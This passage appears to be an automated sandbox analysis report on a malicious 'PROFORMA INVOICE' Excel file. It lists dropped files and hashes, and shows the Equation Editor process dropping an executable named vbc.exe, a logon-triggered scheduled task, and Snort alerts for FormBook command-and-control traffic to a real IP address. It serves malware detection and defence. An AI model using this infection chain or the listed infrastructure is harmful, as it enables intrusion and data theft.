SSDEEP:	384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
MD5:	58DD6AF7C438B638A88D107CC87009C7
SHA1:	F25E7F2F240DC924A7B48538164A5B3A54E91AC6
SHA-256:	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
SHA-512:	C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...\|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..TQ.%..X.......{....,.q.\,.E".........z...abbB...j.\.J.(.b.......\|>...........R....L&..X.eYV"..-.R)B.TM&..pX.j.Z..9..F.Z.6....b.\./%..~...).B<..T.z..D"..(...\...d2YKKK...mm.T..l.T..I$.x<..J..q...J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.\|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..\|>/.Hd2....EQ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED70334.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8E0D407.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECCEF5B6.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3943643.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4194C49.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19408
Entropy (8bit):	7.931403681362504
Encrypted:	false
SSDEEP:	384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
MD5:	63ED10C9DF764CF12C64E6A9A2353D7D
SHA1:	608BE0D9462016EA4F05509704CE85F3DDC50E63
SHA-256:	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
SHA-512:	9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5\|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....\|AQ.h4....x..\6....\|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...\|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..\|0...x...\|..../F....o.._\|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB3FE2AD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Temp\tmp5580.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.117351705366542
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtqxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuT+v
MD5:	801E43323FC83E5CF81D63EFC976ED22
SHA1:	D5D9826FC7D7CCBCDA13E8A8E700936464630A72
SHA-256:	3B295516AFFE40BA373E3A6A3CD1CA5F2331D5E880105007999C7FC98BF3E995
SHA-512:	C648DCA49C3287467DA6E353371152328E3F66E77662B8B96A9E5CA9CFFDEB9ED763F05CF565607D9012F8A24AA8C11624BABE70F4ACAE2B8B9DF00B8085F551
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\~DF179E4FABD168830C.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF364B1570347A7C36.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	CDFV2 Encrypted
Category:	dropped
Size (bytes):	234200
Entropy (8bit):	7.971062018539889
Encrypted:	false
SSDEEP:	6144:0Fxjv6GU1QHKNZoh6XIjlsnpianHyuqIAkvQnZX:0Flv6GMjohDlsnpiOOIAk4nZX
MD5:	F0E46ABA95165B11AD7FC84D80A73730
SHA1:	2EA511219E2C3D76597483C4998A2AF40D821142
SHA-256:	009DFE9D9409704671B802DDAA54EE22355F3FF41C6EF779B7E644C76466E0B0
SHA-512:	F6EA11D97394ACB2485BAF3A6118E9633FE70F7AE8EEF7B3F95F82839BB550374A950BF71E9A0368ABD4579854FD404BF21C7EB44C5BB0666FA797F820114D57
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Temp\~DF5ABA8F4F45C955BE.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC39337F99D373AF1.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6DVTRGQEANC1QDSD4KFD.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5779086355075593
Encrypted:	false
SSDEEP:	96:chQC4MqoqvsqvJCwo0z8hQC4MqoqvsEHyqvJCworeztAKrjH3pxpyXRlUVaA2:cmZo0z8mRHnorezt5Hf8XDA2
MD5:	5CC9D06FCA8872275540D44458C82555
SHA1:	C41B9B609C7405D57B48FD756FB0552EFC365290
SHA-256:	125E9665E115B05130A2D560F8EA76F98BA5806B00B894604B3A0EB657208E9A
SHA-512:	5E3AB889ACC56DF5B1E855B4A6892DF5DE9635DB8CAD5FF875F0229DEBD03B2A2FF66A2CE45AA42E39A2EA6BA6C08704D8209250351DA862A736CC8601A37419
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy) Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5779086355075593
Encrypted:	false
SSDEEP:	96:chQC4MqoqvsqvJCwo0z8hQC4MqoqvsEHyqvJCworeztAKrjH3pxpyXRlUVaA2:cmZo0z8mRHnorezt5Hf8XDA2
MD5:	5CC9D06FCA8872275540D44458C82555
SHA1:	C41B9B609C7405D57B48FD756FB0552EFC365290
SHA-256:	125E9665E115B05130A2D560F8EA76F98BA5806B00B894604B3A0EB657208E9A
SHA-512:	5E3AB889ACC56DF5B1E855B4A6892DF5DE9635DB8CAD5FF875F0229DEBD03B2A2FF66A2CE45AA42E39A2EA6BA6C08704D8209250351DA862A736CC8601A37419
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	444416
Entropy (8bit):	7.8422896972903535
Encrypted:	false
SSDEEP:	12288:Obap00XixBFm3xtkw+Z9Gc6vcu/3G/rTX:Obs00Xi1K+2P+
MD5:	6926A53FA91CAB577D52942A39E5FB53
SHA1:	C15DFC5E94CA97D47FD89DCDC42CC03888334C91
SHA-256:	1BA605473B6FC3B244F25A8838E41A642DBF9566D347D3EA084E96BBE88AEBDE
SHA-512:	02AFC62CCF5C48DD3BFDC2E26EB3C6B997C65DC499D793568D04C3410B0A8961E9C7F738E7E43324D167460C6418EC911CC815A87158680D128D7F80455338FD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(B.a..............0.............6.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...L.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...v..............(.............................................{ .....{!.....{".....{#.....($.....} .....}!.....}"......}#.......0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o...,.(+....{#....{#...o,...+..+....0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

C:\Users\user\Desktop\~$PROFORMA INVOICE.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	444416
Entropy (8bit):	7.8422896972903535
Encrypted:	false
SSDEEP:	12288:Obap00XixBFm3xtkw+Z9Gc6vcu/3G/rTX:Obs00Xi1K+2P+
MD5:	6926A53FA91CAB577D52942A39E5FB53
SHA1:	C15DFC5E94CA97D47FD89DCDC42CC03888334C91
SHA-256:	1BA605473B6FC3B244F25A8838E41A642DBF9566D347D3EA084E96BBE88AEBDE
SHA-512:	02AFC62CCF5C48DD3BFDC2E26EB3C6B997C65DC499D793568D04C3410B0A8961E9C7F738E7E43324D167460C6418EC911CC815A87158680D128D7F80455338FD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(B.a..............0.............6.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...L.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...v..............(.............................................{ .....{!.....{".....{#.....($.....} .....}!.....}"......}#.......0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o...,.(+....{#....{#...o,...+..+....0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.971062018539889
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	PROFORMA INVOICE.xlsx
File size:	234200
MD5:	f0e46aba95165b11ad7fc84d80a73730
SHA1:	2ea511219e2c3d76597483c4998a2af40d821142
SHA256:	009dfe9d9409704671b802ddaa54ee22355f3ff41c6ef779b7e644c76466e0b0
SHA512:	f6ea11d97394acb2485baf3a6118e9633fe70f7ae8eef7b3f95f82839bb550374a950bf71e9a0368abd4579854fd404bf21c7eb44c5bb0666fa797f820114d57
SSDEEP:	6144:0Fxjv6GU1QHKNZoh6XIjlsnpianHyuqIAkvQnZX:0Flv6GMjohDlsnpiOOIAk4nZX
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-19:27:42.461474	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	108.167.189.66
11/25/21-19:27:42.461474	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	108.167.189.66
11/25/21-19:27:42.461474	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	108.167.189.66
11/25/21-19:27:53.403894	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49172	34.102.136.180	192.168.2.22
